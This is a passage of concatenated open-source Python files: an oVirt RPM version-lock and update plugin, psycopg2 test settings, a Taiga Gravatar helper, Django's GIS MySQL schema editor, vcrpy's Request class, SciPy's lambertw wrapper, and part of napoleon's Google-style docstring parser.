os.rename(
self._backup[versionlock_list_file],
versionlock_list_file,
)
def commit(self):
# This must be always execucted so we be sure we
# are locked
# execute rpm directly
# yum is not good in offline usage
if self.environment[osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY]:
rc, out, err = self._parent.execute(
args=(
self._parent.command.get('rpm'),
'-q',
) + tuple(
set(
self.environment[
osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY
]
)
),
)
changes = []
for line in out:
changes.append(
{
'added': line,
}
)
versionlock_uninstall_group = self.environment[
osetupcons.CoreEnv.REGISTER_UNINSTALL_GROUPS
].createGroup(
group='versionlock',
description='YUM version locking configuration',
optional=False
)
modified, content = self._filterVersionLock()
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
self.environment[
osetupcons.CoreEnv.UNINSTALL_UNREMOVABLE_FILES
].append(versionlock_list_file)
if os.path.exists(versionlock_list_file):
versionlock_uninstall_group.addChanges(
'versionlock',
versionlock_list_file,
changes,
)
content[versionlock_list_file].extend(out)
with open(
versionlock_list_file,
'w',
) as f:
f.write(
'\n'.join(
content[versionlock_list_file]
) + '\n'
)
def _getSink(self):
pm = self._PM
class MyPMSink(self._MiniPMSinkBase):
def __init__(self, log):
super(MyPMSink, self).__init__()
self._log = log
def verbose(self, msg):
super(MyPMSink, self).verbose(msg)
self._log.debug('%s %s', pm, msg)
def info(self, msg):
super(MyPMSink, self).info(msg)
self._log.info('%s %s', pm, msg)
def error(self, msg):
super(MyPMSink, self).error(msg)
self._log.error('%s %s', pm, msg)
return MyPMSink(self.logger)
def _checkForPackagesUpdate(self, packages):
update = []
mpm = self._MiniPM(
sink=self._getSink(),
disabledPlugins=('versionlock',),
)
for package in packages:
with mpm.transaction():
mpm.update(packages=(package,))
if mpm.buildTransaction():
if mpm.queryTransaction():
update.append(package)
return update
def _checkForProductUpdate(self):
# TODO: otopi is now providing minidnf too
missingRollback = []
upgradeAvailable = False
mpm = self._MiniPM(
sink=self._getSink(),
disabledPlugins=('versionlock',),
)
plist = []
with mpm.transaction():
groups = [group['name'] for group in mpm.queryGroups()]
for entry in self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
]:
if 'group' in entry and entry['group'] in groups:
mpm.updateGroup(group=entry['group'])
else:
mpm.installUpdate(packages=entry['packages'])
if mpm.buildTransaction():
upgradeAvailable = True
for p in mpm.queryTransaction():
self.logger.debug('PACKAGE: [%s] %s' % (
p['operation'],
p['display_name']
))
plist.append(
_(
'PACKAGE: [{operation}] {display_name}'
).format(
operation=p['operation'],
display_name=p['display_name']
)
)
# Verify all installed packages available in yum
for package in mpm.queryTransaction():
installed = False
reinstall_available = False
for query in mpm.queryPackages(
patterns=(package['display_name'],),
showdups=True,
):
self.logger.debug(
'dupes: operation [%s] package %s' % (
query['operation'],
query['display_name'],
)
)
if query['operation'] == 'installed':
installed = True
if query['operation'] == 'reinstall_available':
reinstall_available = True
if installed and not reinstall_available:
missingRollback.append(package['display_name'])
return (upgradeAvailable, set(missingRollback), plist)
def __init__(self, context):
super(Plugin, self).__init__(context=context)
self._shouldResultVersionLock = False
self._enabled = False
self._distribution = platform.linux_distribution(
full_distribution_name=0
)[0]
@plugin.event(
stage=plugin.Stages.STAGE_INIT,
)
def _init(self):
self.environment.setdefault(
osetupcons.RPMDistroEnv.ENABLE_UPGRADE,
None
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK,
None
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY,
[]
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.VERSION_LOCK_FILTER,
[]
)
self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
] = []
self.environment[
osetupcons.RPMDistroEnv.PACKAGES_SETUP
] = []
@plugin.event(
stage=plugin.Stages.STAGE_SETUP,
condition=lambda self: (
not self.environment[
osetupcons.CoreEnv.DEVELOPER_MODE
] and
self._distribution in ('redhat', 'fedora', 'centos')
),
)
def _setup(self):
self.command.detect('rpm')
self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(
self.VersionLockTransaction(
parent=self,
)
)
if not self.environment[
osetupcons.CoreEnv.OFFLINE_PACKAGER
]:
self._PM, self._MiniPM, self._MiniPMSinkBase = (
osetuputil.getPackageManager(self.logger)
)
self._enabled = True
@plugin.event(
stage=plugin.Stages.STAGE_CUSTOMIZATION,
name=osetupcons.Stages.DISTRO_RPM_PACKAGE_UPDATE_CHECK,
before=(
osetupcons.Stages.DIALOG_TITLES_E_PACKAGES,
),
after=(
osetupcons.Stages.DIALOG_TITLES_S_PACKAGES,
),
condition=lambda self: self._enabled,
)
def _customization(self):
# assume we have nothing to do
self._enabled = False
upgradeAvailable = None
missingRollback = None
if self.environment[osetupcons.RPMDistroEnv.ENABLE_UPGRADE] is None:
self.logger.info(_('Checking for product updates...'))
(
upgradeAvailable,
missingRollback,
plist,
) = self._checkForProductUpdate()
if not upgradeAvailable:
self.logger.info(_('No product updates found'))
else:
self.environment[
osetupcons.RPMDistroEnv.ENABLE_UPGRADE
] = dialog.queryBoolean(
dialog=self.dialog,
name='OVESETUP_RPMDISTRO_PACKAGE_UPGRADE',
note=_(
'Setup has found updates for some packages:\n'
'{plist}\n'
'do you wish to update them now? '
'(@VALUES@) [@DEFAULT@]: '
).format(
plist='\n'.join(plist)
),
prompt=True,
true=_('Yes'),
false=_('No'),
default=True,
)
if self.environment[osetupcons.RPMDistroEnv.ENABLE_UPGRADE]:
self.logger.info(_('Checking for an update for Setup...'))
update = self._checkForPackagesUpdate(
packages=self.environment[
osetupcons.RPMDistroEnv.PACKAGES_SETUP
],
)
if update:
self.dialog.note(
text=_(
'An update for the Setup packages {packages} was '
'found. Please update that package by running:\n'
'"{pm} update {packages}"\nand then execute Setup '
'again.'
).format(
pm=self._PM.lower(),
packages=' '.join(update),
),
)
raise RuntimeError(_('Please update the Setup packages'))
if upgradeAvailable is None:
(
upgradeAvailable,
missingRollback,
plist,
) = self._checkForProductUpdate()
if not upgradeAvailable:
self.dialog.note(text=_('No update for Setup found'))
else:
if missingRollback:
if self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
] is None:
self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
] = dialog.queryBoolean(
dialog=self.dialog,
name='OVESETUP_RPMDISTRO_REQUIRE_ROLLBACK',
note=_(
'Setup will not be able to rollback new '
'packages in case of a failure, because '
'the following installed packages were not '
'found in enabled repositories:\n\n'
'{missingRollback}\n'
'Do you want to abort Setup? '
'(@VALUES@) [@DEFAULT@]: '
).format(
missingRollback='\n'.join(
list(missingRollback)
),
),
prompt=True,
true=_('Yes'),
false=_('No'),
default=True,
)
if self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
]:
raise RuntimeError(
_('Package rollback information is unavailable')
)
#
# Disable yum rollback on transaction failure
# as rhel yum will remove packages that were updated
# without installing previous ones.
#
self.environment[
otopicons.PackEnv.YUM_ROLLBACK
] = False
self._enabled = self.environment[
osetupcons.RPMDistroEnv.ENABLE_UPGRADE
]
if not self._enabled and upgradeAvailable:
raise RuntimeError(
_('Aborted, packages must be updated')
)
@plugin.event(
stage=plugin.Stages.STAGE_PACKAGES,
condition=lambda self: self._enabled,
)
def packages(self):
groups = [group['name'] for group in self.packager.queryGroups()]
for entry in self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
]:
if 'group' in entry and entry['group'] in groups:
self.packager.updateGroup(group=entry['group'])
else:
self.packager.installUpdate(packages=entry['packages'])
# vim: expandtab tabstop=4 shiftwidth=4
| apache-2.0 |
zxjzxj9/FlaskBoard | web/lib/python2.7/site-packages/psycopg2/tests/testconfig.py | 10 | 1249 | # Configure the test suite from the env variables.
import os
dbname = os.environ.get('PSYCOPG2_TESTDB', 'psycopg2_test')
dbhost = os.environ.get('PSYCOPG2_TESTDB_HOST', None)
dbport = os.environ.get('PSYCOPG2_TESTDB_PORT', None)
dbuser = os.environ.get('PSYCOPG2_TESTDB_USER', None)
dbpass = os.environ.get('PSYCOPG2_TESTDB_PASSWORD', None)
repl_dsn = os.environ.get('PSYCOPG2_TEST_REPL_DSN',
"dbname=psycopg2_test replication=1")
# Check if we want to test psycopg's green path.
green = os.environ.get('PSYCOPG2_TEST_GREEN', None)
if green:
if green == '1':
from psycopg2.extras import wait_select as wait_callback
elif green == 'eventlet':
from eventlet.support.psycopg2_patcher import eventlet_wait_callback \
as wait_callback
else:
raise ValueError("please set 'PSYCOPG2_TEST_GREEN' to a valid value")
import psycopg2.extensions
psycopg2.extensions.set_wait_callback(wait_callback)
# Construct a DSN to connect to the test database:
dsn = 'dbname=%s' % dbname
if dbhost is not None:
dsn += ' host=%s' % dbhost
if dbport is not None:
dsn += ' port=%s' % dbport
if dbuser is not None:
dsn += ' user=%s' % dbuser
if dbpass is not None:
dsn += ' password=%s' % dbpass
| apache-2.0 |
dayatz/taiga-back | taiga/users/gravatar.py | 1 | 1419 | # -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2017 Jesús Espino <[email protected]>
# Copyright (C) 2014-2017 David Barragán <[email protected]>
# Copyright (C) 2014-2017 Alejandro Alonso <[email protected]>
# Copyright (C) 2014-2017 Anler Hernández <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import hashlib
def get_gravatar_id(email: str) -> str:
"""Get the gravatar id associated to an email.
:return: Gravatar id.
"""
return hashlib.md5(email.lower().encode()).hexdigest()
def get_user_gravatar_id(user: object) -> str:
"""Get the gravatar id associated to a user.
:return: Gravatar id.
"""
if user and user.email:
return get_gravatar_id(user.email)
return None
| agpl-3.0 |
JakeBrand/CMPUT410-E6 | v1/lib/python2.7/site-packages/django/contrib/gis/db/backends/mysql/schema.py | 57 | 3048 | import logging
from django.contrib.gis.db.models.fields import GeometryField
from django.db.utils import OperationalError
from django.db.backends.mysql.schema import DatabaseSchemaEditor
logger = logging.getLogger('django.contrib.gis')
class MySQLGISSchemaEditor(DatabaseSchemaEditor):
sql_add_spatial_index = 'CREATE SPATIAL INDEX %(index)s ON %(table)s(%(column)s)'
sql_drop_spatial_index = 'DROP INDEX %(index)s ON %(table)s'
def __init__(self, *args, **kwargs):
super(MySQLGISSchemaEditor, self).__init__(*args, **kwargs)
self.geometry_sql = []
def skip_default(self, field):
return (
super(MySQLGISSchemaEditor, self).skip_default(field) or
# Geometry fields are stored as BLOB/TEXT and can't have defaults.
isinstance(field, GeometryField)
)
def column_sql(self, model, field, include_default=False):
column_sql = super(MySQLGISSchemaEditor, self).column_sql(model, field, include_default)
# MySQL doesn't support spatial indexes on NULL columns
if isinstance(field, GeometryField) and field.spatial_index and not field.null:
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
self.geometry_sql.append(
self.sql_add_spatial_index % {
'index': qn(self._create_spatial_index_name(model, field)),
'table': qn(db_table),
'column': qn(field.column),
}
)
return column_sql
def create_model(self, model):
super(MySQLGISSchemaEditor, self).create_model(model)
self.create_spatial_indexes()
def add_field(self, model, field):
super(MySQLGISSchemaEditor, self).add_field(model, field)
self.create_spatial_indexes()
def remove_field(self, model, field):
if isinstance(field, GeometryField) and field.spatial_index:
qn = self.connection.ops.quote_name
sql = self.sql_drop_spatial_index % {
'index': qn(self._create_spatial_index_name(model, field)),
'table': qn(model._meta.db_table),
}
try:
self.execute(sql)
except OperationalError:
logger.error(
"Couldn't remove spatial index: %s (may be expected "
"if your storage engine doesn't support them)." % sql
)
super(MySQLGISSchemaEditor, self).remove_field(model, field)
def _create_spatial_index_name(self, model, field):
return '%s_%s_id' % (model._meta.db_table, field.column)
def create_spatial_indexes(self):
for sql in self.geometry_sql:
try:
self.execute(sql)
except OperationalError:
logger.error(
"Cannot create SPATIAL INDEX %s. Only MyISAM and (as of "
"MySQL 5.7.5) InnoDB support them." % sql
)
self.geometry_sql = []
| apache-2.0 |
aclevy/vcrpy | vcr/request.py | 3 | 3068 | from six import BytesIO, text_type
from six.moves.urllib.parse import urlparse, parse_qsl
class Request(object):
"""
VCR's representation of a request.
There is a weird quirk in HTTP. You can send the same header twice. For
this reason, headers are represented by a dict, with lists as the values.
However, it appears that HTTPlib is completely incapable of sending the
same header twice. This puts me in a weird position: I want to be able to
accurately represent HTTP headers in cassettes, but I don't want the extra
step of always having to do [0] in the general case, i.e.
request.headers['key'][0]
In addition, some servers sometimes send the same header more than once,
and httplib *can* deal with this situation.
Futhermore, I wanted to keep the request and response cassette format as
similar as possible.
For this reason, in cassettes I keep a dict with lists as keys, but once
deserialized into VCR, I keep them as plain, naked dicts.
"""
def __init__(self, method, uri, body, headers):
self.method = method
self.uri = uri
self._was_file = hasattr(body, 'read')
if self._was_file:
self.body = body.read()
else:
self.body = body
self.headers = {}
for key in headers:
self.add_header(key, headers[key])
@property
def body(self):
return BytesIO(self._body) if self._was_file else self._body
@body.setter
def body(self, value):
if isinstance(value, text_type):
value = value.encode('utf-8')
self._body = value
def add_header(self, key, value):
# see class docstring for an explanation
if isinstance(value, (tuple, list)):
self.headers[key] = value[0]
else:
self.headers[key] = value
@property
def scheme(self):
return urlparse(self.uri).scheme
@property
def host(self):
return urlparse(self.uri).hostname
@property
def port(self):
parse_uri = urlparse(self.uri)
port = parse_uri.port
if port is None:
port = {'https': 443, 'http': 80}[parse_uri.scheme]
return port
@property
def path(self):
return urlparse(self.uri).path
@property
def query(self):
q = urlparse(self.uri).query
return sorted(parse_qsl(q))
# alias for backwards compatibility
@property
def url(self):
return self.uri
# alias for backwards compatibility
@property
def protocol(self):
return self.scheme
def __str__(self):
return "<Request ({0}) {1}>".format(self.method, self.uri)
def __repr__(self):
return self.__str__()
def _to_dict(self):
return {
'method': self.method,
'uri': self.uri,
'body': self.body,
'headers': dict(((k, [v]) for k, v in self.headers.items())),
}
@classmethod
def _from_dict(cls, dct):
return Request(**dct)
| mit |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/special/lambertw.py | 33 | 3041 | from __future__ import division, print_function, absolute_import
from ._ufuncs import _lambertw
def lambertw(z, k=0, tol=1e-8):
r"""
lambertw(z, k=0, tol=1e-8)
Lambert W function.
The Lambert W function `W(z)` is defined as the inverse function
of ``w * exp(w)``. In other words, the value of ``W(z)`` is
such that ``z = W(z) * exp(W(z))`` for any complex number
``z``.
The Lambert W function is a multivalued function with infinitely
many branches. Each branch gives a separate solution of the
equation ``z = w exp(w)``. Here, the branches are indexed by the
integer `k`.
Parameters
----------
z : array_like
Input argument.
k : int, optional
Branch index.
tol : float, optional
Evaluation tolerance.
Returns
-------
w : array
`w` will have the same shape as `z`.
Notes
-----
All branches are supported by `lambertw`:
* ``lambertw(z)`` gives the principal solution (branch 0)
* ``lambertw(z, k)`` gives the solution on branch `k`
The Lambert W function has two partially real branches: the
principal branch (`k = 0`) is real for real ``z > -1/e``, and the
``k = -1`` branch is real for ``-1/e < z < 0``. All branches except
``k = 0`` have a logarithmic singularity at ``z = 0``.
**Possible issues**
The evaluation can become inaccurate very close to the branch point
at ``-1/e``. In some corner cases, `lambertw` might currently
fail to converge, or can end up on the wrong branch.
**Algorithm**
Halley's iteration is used to invert ``w * exp(w)``, using a first-order
asymptotic approximation (O(log(w)) or `O(w)`) as the initial estimate.
The definition, implementation and choice of branches is based on [2]_.
See Also
--------
wrightomega : the Wright Omega function
References
----------
.. [1] http://en.wikipedia.org/wiki/Lambert_W_function
.. [2] Corless et al, "On the Lambert W function", Adv. Comp. Math. 5
(1996) 329-359.
http://www.apmaths.uwo.ca/~djeffrey/Offprints/W-adv-cm.pdf
Examples
--------
The Lambert W function is the inverse of ``w exp(w)``:
>>> from scipy.special import lambertw
>>> w = lambertw(1)
>>> w
(0.56714329040978384+0j)
>>> w * np.exp(w)
(1.0+0j)
Any branch gives a valid inverse:
>>> w = lambertw(1, k=3)
>>> w
(-2.8535817554090377+17.113535539412148j)
>>> w*np.exp(w)
(1.0000000000000002+1.609823385706477e-15j)
**Applications to equation-solving**
The Lambert W function may be used to solve various kinds of
equations, such as finding the value of the infinite power
tower :math:`z^{z^{z^{\ldots}}}`:
>>> def tower(z, n):
... if n == 0:
... return z
... return z ** tower(z, n-1)
...
>>> tower(0.5, 100)
0.641185744504986
>>> -lambertw(-np.log(0.5)) / np.log(0.5)
(0.64118574450498589+0j)
"""
return _lambertw(z, k, tol)
| mit |
kdwink/intellij-community | python/helpers/sphinxcontrib/napoleon/docstring.py | 44 | 32526 | # -*- coding: utf-8 -*-
# Copyright 2014 Rob Ruana
# Licensed under the BSD License, see LICENSE file for details.
"""Classes for docstring parsing and formatting."""
import collections
import inspect
import re
import sys
from six.moves import range
from pockets import modify_iter
from six import string_types
_directive_regex = re.compile(r'\.\. \S+::')
_google_section_regex = re.compile(r'^(\s|\w)+:\s*$')
_google_typed_arg_regex = re.compile(r'\s*(.+?)\s*\(\s*(.+?)\s*\)')
_numpy_section_regex = re.compile(r'^[=\-`:\'"~^_*+#<>]{2,}\s*$')
_xref_regex = re.compile(r'(:\w+:\S+:`.+?`|:\S+:`.+?`|`.+?`)')
class GoogleDocstring(object):
"""Convert Google style docstrings to reStructuredText.
Parameters
----------
docstring : str or List[str]
The docstring to parse, given either as a string or split into
individual lines.
config : Optional[sphinxcontrib.napoleon.Config or sphinx.config.Config]
The configuration settings to use. If not given, defaults to the
config object on `app`; or if `app` is not given defaults to the
a new `sphinxcontrib.napoleon.Config` object.
See Also
--------
:class:`sphinxcontrib.napoleon.Config`
Other Parameters
----------------
app : Optional[sphinx.application.Sphinx]
Application object representing the Sphinx process.
what : Optional[str]
A string specifying the type of the object to which the docstring
belongs. Valid values: "module", "class", "exception", "function",
"method", "attribute".
name : Optional[str]
The fully qualified name of the object.
obj : module, class, exception, function, method, or attribute
The object to which the docstring belongs.
options : Optional[sphinx.ext.autodoc.Options]
The options given to the directive: an object with attributes
inherited_members, undoc_members, show_inheritance and noindex that
are True if the flag option of same name was given to the auto
directive.
Example
-------
>>> from sphinxcontrib.napoleon import Config
>>> config = Config(napoleon_use_param=True, napoleon_use_rtype=True)
>>> docstring = '''One line summary.
...
... Extended description.
...
... Args:
... arg1(int): Description of `arg1`
... arg2(str): Description of `arg2`
... Returns:
... str: Description of return value.
... '''
>>> print(GoogleDocstring(docstring, config))
One line summary.
<BLANKLINE>
Extended description.
<BLANKLINE>
:param arg1: Description of `arg1`
:type arg1: int
:param arg2: Description of `arg2`
:type arg2: str
<BLANKLINE>
:returns: Description of return value.
:rtype: str
<BLANKLINE>
"""
def __init__(self, docstring, config=None, app=None, what='', name='',
obj=None, options=None):
self._config = config
self._app = app
if not self._config:
from sphinxcontrib.napoleon import Config
self._config = self._app and self._app.config or Config()
if not what:
if inspect.isclass(obj):
what = 'class'
elif inspect.ismodule(obj):
what = 'module'
elif isinstance(obj, collections.Callable):
what = 'function'
else:
what = 'object'
self._what = what
self._name = name
self._obj = obj
self._opt = options
if isinstance(docstring, string_types):
docstring = docstring.splitlines()
self._lines = docstring
self._line_iter = modify_iter(docstring, modifier=lambda s: s.rstrip())
self._parsed_lines = []
self._is_in_section = False
self._section_indent = 0
if not hasattr(self, '_directive_sections'):
self._directive_sections = []
if not hasattr(self, '_sections'):
self._sections = {
'args': self._parse_parameters_section,
'arguments': self._parse_parameters_section,
'attributes': self._parse_attributes_section,
'example': self._parse_examples_section,
'examples': self._parse_examples_section,
'keyword args': self._parse_keyword_arguments_section,
'keyword arguments': self._parse_keyword_arguments_section,
'methods': self._parse_methods_section,
'note': self._parse_note_section,
'notes': self._parse_notes_section,
'other parameters': self._parse_other_parameters_section,
'parameters': self._parse_parameters_section,
'return': self._parse_returns_section,
'returns': self._parse_returns_section,
'raises': self._parse_raises_section,
'references': self._parse_references_section,
'see also': self._parse_see_also_section,
'warning': self._parse_warning_section,
'warnings': self._parse_warning_section,
'warns': self._parse_warns_section,
'yield': self._parse_yields_section,
'yields': self._parse_yields_section,
}
self._parse()
def __str__(self):
"""Return the parsed docstring in reStructuredText format.
Returns
-------
str
UTF-8 encoded version of the docstring.
"""
if sys.version_info[0] >= 3:
return self.__unicode__()
else:
return self.__unicode__().encode('utf8')
def __unicode__(self):
"""Return the parsed docstring in reStructuredText format.
Returns
-------
unicode
Unicode version of the docstring.
"""
return u'\n'.join(self.lines())
def lines(self):
"""Return the parsed lines of the docstring in reStructuredText format.
Returns
-------
List[str]
The lines of the docstring in a list.
"""
return self._parsed_lines
def _consume_indented_block(self, indent=1):
lines = []
line = self._line_iter.peek()
while(not self._is_section_break() and
(not line or self._is_indented(line, indent))):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
def _consume_contiguous(self):
lines = []
while (self._line_iter.has_next() and
self._line_iter.peek() and
not self._is_section_header()):
lines.append(next(self._line_iter))
return lines
def _consume_empty(self):
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and not line:
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
def _consume_field(self, parse_type=True, prefer_type=False):
line = next(self._line_iter)
before, colon, after = self._partition_field_on_colon(line)
_name, _type, _desc = before, '', after
if parse_type:
match = _google_typed_arg_regex.match(before)
if match:
_name = match.group(1)
_type = match.group(2)
if _name[:2] == '**':
_name = r'\*\*'+_name[2:]
elif _name[:1] == '*':
_name = r'\*'+_name[1:]
if prefer_type and not _type:
_type, _name = _name, _type
indent = self._get_indent(line) + 1
_desc = [_desc] + self._dedent(self._consume_indented_block(indent))
_desc = self.__class__(_desc, self._config).lines()
return _name, _type, _desc
def _consume_fields(self, parse_type=True, prefer_type=False):
self._consume_empty()
fields = []
while not self._is_section_break():
_name, _type, _desc = self._consume_field(parse_type, prefer_type)
if _name or _type or _desc:
fields.append((_name, _type, _desc,))
return fields
def _consume_inline_attribute(self):
line = next(self._line_iter)
_type, colon, _desc = self._partition_field_on_colon(line)
if not colon:
_type, _desc = _desc, _type
_desc = [_desc] + self._dedent(self._consume_to_end())
_desc = self.__class__(_desc, self._config).lines()
return _type, _desc
def _consume_returns_section(self):
lines = self._dedent(self._consume_to_next_section())
if lines:
before, colon, after = self._partition_field_on_colon(lines[0])
_name, _type, _desc = '', '', lines
if colon:
if after:
_desc = [after] + lines[1:]
else:
_desc = lines[1:]
match = _google_typed_arg_regex.match(before)
if match:
_name = match.group(1)
_type = match.group(2)
else:
_type = before
_desc = self.__class__(_desc, self._config).lines()
return [(_name, _type, _desc,)]
else:
return []
def _consume_usage_section(self):
lines = self._dedent(self._consume_to_next_section())
return lines
def _consume_section_header(self):
section = next(self._line_iter)
stripped_section = section.strip(':')
if stripped_section.lower() in self._sections:
section = stripped_section
return section
def _consume_to_end(self):
lines = []
while self._line_iter.has_next():
lines.append(next(self._line_iter))
return lines
def _consume_to_next_section(self):
self._consume_empty()
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
def _dedent(self, lines, full=False):
if full:
return [line.lstrip() for line in lines]
else:
min_indent = self._get_min_indent(lines)
return [line[min_indent:] for line in lines]
def _format_admonition(self, admonition, lines):
lines = self._strip_empty(lines)
if len(lines) == 1:
return ['.. %s:: %s' % (admonition, lines[0].strip()), '']
elif lines:
lines = self._indent(self._dedent(lines), 3)
return ['.. %s::' % admonition, ''] + lines + ['']
else:
return ['.. %s::' % admonition, '']
def _format_block(self, prefix, lines, padding=None):
if lines:
if padding is None:
padding = ' ' * len(prefix)
result_lines = []
for i, line in enumerate(lines):
if i == 0:
result_lines.append((prefix + line).rstrip())
elif line:
result_lines.append(padding + line)
else:
result_lines.append('')
return result_lines
else:
return [prefix]
def _format_field(self, _name, _type, _desc):
_desc = self._strip_empty(_desc)
has_desc = any(_desc)
separator = has_desc and ' -- ' or ''
if _name:
if _type:
if '`' in _type:
field = '**%s** (%s)%s' % (_name, _type, separator)
else:
field = '**%s** (*%s*)%s' % (_name, _type, separator)
else:
field = '**%s**%s' % (_name, separator)
elif _type:
if '`' in _type:
field = '%s%s' % (_type, separator)
else:
field = '*%s*%s' % (_type, separator)
else:
field = ''
if has_desc:
return [field + _desc[0]] + _desc[1:]
else:
return [field]
def _format_fields(self, field_type, fields):
field_type = ':%s:' % field_type.strip()
padding = ' ' * len(field_type)
multi = len(fields) > 1
lines = []
for _name, _type, _desc in fields:
field = self._format_field(_name, _type, _desc)
if multi:
if lines:
lines.extend(self._format_block(padding + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' ', field))
if lines and lines[-1]:
lines.append('')
return lines
def _get_current_indent(self, peek_ahead=0):
line = self._line_iter.peek(peek_ahead + 1)[peek_ahead]
while line != self._line_iter.sentinel:
if line:
return self._get_indent(line)
peek_ahead += 1
line = self._line_iter.peek(peek_ahead + 1)[peek_ahead]
return 0
def _get_indent(self, line):
for i, s in enumerate(line):
if not s.isspace():
return i
return len(line)
def _get_min_indent(self, lines):
min_indent = None
for line in lines:
if line:
indent = self._get_indent(line)
if min_indent is None:
min_indent = indent
elif indent < min_indent:
min_indent = indent
return min_indent or 0
def _indent(self, lines, n=4):
return [(' ' * n) + line for line in lines]
def _is_indented(self, line, indent=1):
for i, s in enumerate(line):
if i >= indent:
return True
elif not s.isspace():
return False
return False
def _is_section_header(self):
section = self._line_iter.peek().lower()
match = _google_section_regex.match(section)
if match and section.strip(':') in self._sections:
header_indent = self._get_indent(section)
section_indent = self._get_current_indent(peek_ahead=1)
return section_indent > header_indent
elif self._directive_sections:
if _directive_regex.match(section):
for directive_section in self._directive_sections:
if section.startswith(directive_section):
return True
return False
def _is_section_break(self):
line = self._line_iter.peek()
return (not self._line_iter.has_next() or
self._is_section_header() or
(self._is_in_section and
line and
not self._is_indented(line, self._section_indent)))
def _parse(self):
self._parsed_lines = self._consume_empty()
if self._name and (self._what == 'attribute' or self._what == 'data'):
self._parsed_lines.extend(self._parse_attribute_docstring())
return
while self._line_iter.has_next():
if self._is_section_header():
try:
section = self._consume_section_header()
self._is_in_section = True
self._section_indent = self._get_current_indent()
if _directive_regex.match(section):
lines = [section] + self._consume_to_next_section()
else:
lines = self._sections[section.lower()](section)
finally:
self._is_in_section = False
self._section_indent = 0
else:
if not self._parsed_lines:
lines = self._consume_contiguous() + self._consume_empty()
else:
lines = self._consume_to_next_section()
self._parsed_lines.extend(lines)
def _parse_attribute_docstring(self):
_type, _desc = self._consume_inline_attribute()
return self._format_field('', _type, _desc)
def _parse_attributes_section(self, section):
lines = []
for _name, _type, _desc in self._consume_fields():
if self._config.napoleon_use_ivar:
field = ':ivar %s: ' % _name
lines.extend(self._format_block(field, _desc))
if _type:
lines.append(':vartype %s: %s' % (_name, _type))
else:
lines.extend(['.. attribute:: ' + _name, ''])
field = self._format_field('', _type, _desc)
lines.extend(self._indent(field, 3))
lines.append('')
if self._config.napoleon_use_ivar:
lines.append('')
return lines
def _parse_examples_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_examples
return self._parse_generic_section(section, use_admonition)
def _parse_usage_section(self, section):
header = ['.. rubric:: Usage:', '']
block = ['.. code-block:: python', '']
lines = self._consume_usage_section()
lines = self._indent(lines, 3)
return header + block + lines + ['']
def _parse_generic_section(self, section, use_admonition):
lines = self._strip_empty(self._consume_to_next_section())
lines = self._dedent(lines)
if use_admonition:
header = '.. admonition:: %s' % section
lines = self._indent(lines, 3)
else:
header = '.. rubric:: %s' % section
if lines:
return [header, ''] + lines + ['']
else:
return [header, '']
def _parse_keyword_arguments_section(self, section):
return self._format_fields('Keyword Arguments', self._consume_fields())
def _parse_methods_section(self, section):
lines = []
for _name, _, _desc in self._consume_fields(parse_type=False):
lines.append('.. method:: %s' % _name)
if _desc:
lines.extend([''] + self._indent(_desc, 3))
lines.append('')
return lines
def _parse_note_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('note', lines)
def _parse_notes_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_notes
return self._parse_generic_section('Notes', use_admonition)
def _parse_other_parameters_section(self, section):
return self._format_fields('Other Parameters', self._consume_fields())
def _parse_parameters_section(self, section):
fields = self._consume_fields()
if self._config.napoleon_use_param:
lines = []
for _name, _type, _desc in fields:
field = ':param %s: ' % _name
lines.extend(self._format_block(field, _desc))
if _type:
lines.append(':type %s: %s' % (_name, _type))
return lines + ['']
else:
return self._format_fields('Parameters', fields)
def _parse_raises_section(self, section):
fields = self._consume_fields(parse_type=False, prefer_type=True)
field_type = ':raises:'
padding = ' ' * len(field_type)
multi = len(fields) > 1
lines = []
for _, _type, _desc in fields:
_desc = self._strip_empty(_desc)
has_desc = any(_desc)
separator = has_desc and ' -- ' or ''
if _type:
has_refs = '`' in _type or ':' in _type
has_space = any(c in ' \t\n\v\f ' for c in _type)
if not has_refs and not has_space:
_type = ':exc:`%s`%s' % (_type, separator)
elif has_desc and has_space:
_type = '*%s*%s' % (_type, separator)
else:
_type = '%s%s' % (_type, separator)
if has_desc:
field = [_type + _desc[0]] + _desc[1:]
else:
field = [_type]
else:
field = _desc
if multi:
if lines:
lines.extend(self._format_block(padding + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' ', field))
if lines and lines[-1]:
lines.append('')
return lines
def _parse_references_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_references
return self._parse_generic_section('References', use_admonition)
